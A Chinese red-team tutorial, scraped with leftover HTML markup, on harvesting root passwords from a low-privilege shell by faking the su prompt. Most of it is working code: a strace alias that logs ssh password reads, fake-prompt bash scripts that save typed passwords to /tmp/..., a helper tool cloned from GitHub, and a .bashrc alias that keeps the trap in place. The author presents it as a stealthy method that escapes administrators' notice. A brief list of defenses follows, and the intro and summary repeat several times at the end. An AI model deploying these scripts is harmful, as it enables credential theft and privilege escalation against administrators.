利用su小偷实现低权限用户窃取root用户口令技术分析<\/h1>

背景介绍<\/h2>
在内部红蓝对抗实战中，攻击者常常需要获取高权限用户的口令。通过监控服务器上的认证过程，可以窃取敏感信息。本文详细分析了几种窃取su命令密码的技术方案，并提供了最优实现方法。<\/p>

技术分析<\/h2>

1. 初始方案：strace监控<\/h3>

实现方法<\/strong>：<\/p>

alias ssh=<\/span>'strace -o \/tmp\/.sshpwd-`date +%d%h%m%s`.log -e read -s2048 ssh'<\/span>
<\/span><\/span><\/code><\/pre>局限性<\/strong>：<\/p>

不能完美应用于su命令<\/li>
使用strace监控su会导致无论输入正确密码与否都提示"Authentication failure"<\/li>
容易引起管理员怀疑<\/li>
<\/ul>
2. su命令实现原理<\/h3>

su使用PAM(Pluggable Authentication Modules)认证机制<\/li>
PAM框架将认证过程与具体实现分离<\/li>
实际认证过程在pam_rootok.so<\/code>和pam_unix.so<\/code>模块中完成<\/li>
su命令设置了SUID属性，普通用户无法重现实现具有SUID的su<\/li>
<\/ul>
3. brootkit方案分析<\/h3>
代码片段<\/strong>：<\/p>
[<\/span> ! -f \/tmp\/... ]<\/span> &&<\/span> `<\/span> touch \/tmp\/... &&<\/span> chmod 777<\/span> \/tmp\/... >\/dev\/null 2>&1`<\/span>
<\/span><\/span>echo -ne "Password:\r\033[?25l"<\/span>
<\/span><\/span>read -t 30<\/span> -s pass
<\/span><\/span>echo -ne "\033[K\033[?25h"<\/span>
<\/span><\/span>\/bin\/su &&<\/span> unset su &&<\/span> echo $pass >> \/tmp\/...
<\/span><\/span><\/code><\/pre>缺陷<\/strong>：<\/p>

管理员需要输入两次回车和两次密码<\/li>
异常行为明显，容易被发现<\/li>
<\/ul>
4. fakesu.c方案分析<\/h3>
特点<\/strong>：<\/p>

较古老的实现方式<\/li>
无论密码正确与否都提示认证失败<\/li>
现代环境中容易被识别<\/li>
<\/ul>
5. 基础bash脚本方案<\/h3>
初始脚本<\/strong>：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>echo -ne "Password:\c"<\/span>
<\/span><\/span>read -t 30<\/span> -s pass
<\/span><\/span>echo "<\/span>$pass"<\/span> >> \/tmp\/...
<\/span><\/span>echo "<\/span>$pass"<\/span> | \/bin\/su $*
<\/span><\/span><\/code><\/pre>问题<\/strong>：<\/p>

su命令不接受管道符传递密码<\/li>
需要终端标准化输入<\/li>
<\/ul>
6. 优化方案：仿sshpass实现<\/h3>
解决方案<\/strong>：<\/p>

寻找类似sshpass的工具实现su密码传递<\/li>
开发自定义工具实现-p<\/code>参数传递密码给\/bin\/su<\/code><\/li>
<\/ul>
最终实现脚本(sushell)<\/strong>：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>echo -ne "Password:\c"<\/span>
<\/span><\/span>read -t 30<\/span> -s pass
<\/span><\/span>echo "<\/span>$pass"<\/span> >> \/tmp\/...
<\/span><\/span>\/tmp\/.su -p "<\/span>$pass"<\/span> \/bin\/su $*
<\/span><\/span><\/code><\/pre>关键组件<\/strong>：<\/p>

\/tmp\/.su<\/code>：自定义工具，实现密码参数传递功能<\/li>
通过alias替换系统su命令：alias su=\/tmp\/sushell<\/code><\/li>
<\/ul>
实现步骤<\/h2>


下载并编译su小偷工具：<\/p>
git clone https:\/\/github.com\/stanleyb0y\/sushell
<\/span><\/span>cd sushell
<\/span><\/span>make
<\/span><\/span>cp pty \/tmp\/.su
<\/span><\/span><\/code><\/pre><\/li>

创建sushell脚本：<\/p>
#!\/bin\/bash
<\/span><\/span><\/span><\/span>echo -ne "Password:\c"<\/span>
<\/span><\/span>read -t 30<\/span> -s pass
<\/span><\/span>echo "<\/span>$pass"<\/span> >> \/tmp\/...
<\/span><\/span>\/tmp\/.su -p "<\/span>$pass"<\/span> \/bin\/su $*
<\/span><\/span><\/code><\/pre><\/li>

设置alias持久化：<\/p>
alias su=<\/span>\/tmp\/sushell
<\/span><\/span># 或者添加到.bashrc影响所有后续登录用户<\/span>
<\/span><\/span>echo 'alias su=\/tmp\/sushell'<\/span> >> ~\/.bashrc
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
效果验证<\/h2>

密码输入错误时：正常显示认证失败<\/li>
密码输入正确时：正常切换用户<\/li>
所有尝试的密码都被记录到\/tmp\/...<\/code>文件中<\/li>
<\/ul>
防御措施<\/h2>

监控异常alias设置<\/li>
检查\/tmp目录下可疑文件<\/li>
使用md5sum<\/code>或sha256sum<\/code>定期校验su二进制文件<\/li>
限制普通用户对敏感目录的写入权限<\/li>
使用sudo替代su进行权限切换<\/li>
<\/ol>
总结<\/h2>
本文分析了多种su密码窃取技术，最终提供了通过自定义工具实现密码窃取的完整方案。该方案相比之前的方法更加隐蔽，不会引起管理员怀疑，是红队实战中获取高权限的有效手段。<\/p>

利用su小偷实现低权限用户窃取root用户口令技术分析<\/h1>

背景介绍<\/h2> 在内部红蓝对抗实战中，攻击者常常需要获取高权限用户的口令。通过监控服务器上的认证过程，可以窃取敏感信息。本文详细分析了几种窃取su命令密码的技术方案，并提供了最优实现方法。<\/p>

技术分析<\/h2>

总结<\/h2> 本文分析了多种su密码窃取技术，最终提供了通过自定义工具实现密码窃取的完整方案。该方案相比之前的方法更加隐蔽，不会引起管理员怀疑，是红队实战中获取高权限的有效手段。<\/p>

背景介绍<\/h2>
在内部红蓝对抗实战中，攻击者常常需要获取高权限用户的口令。通过监控服务器上的认证过程，可以窃取敏感信息。本文详细分析了几种窃取su命令密码的技术方案，并提供了最优实现方法。<\/p>

总结<\/h2>
本文分析了多种su密码窃取技术，最终提供了通过自定义工具实现密码窃取的完整方案。该方案相比之前的方法更加隐蔽，不会引起管理员怀疑，是红队实战中获取高权限的有效手段。<\/p>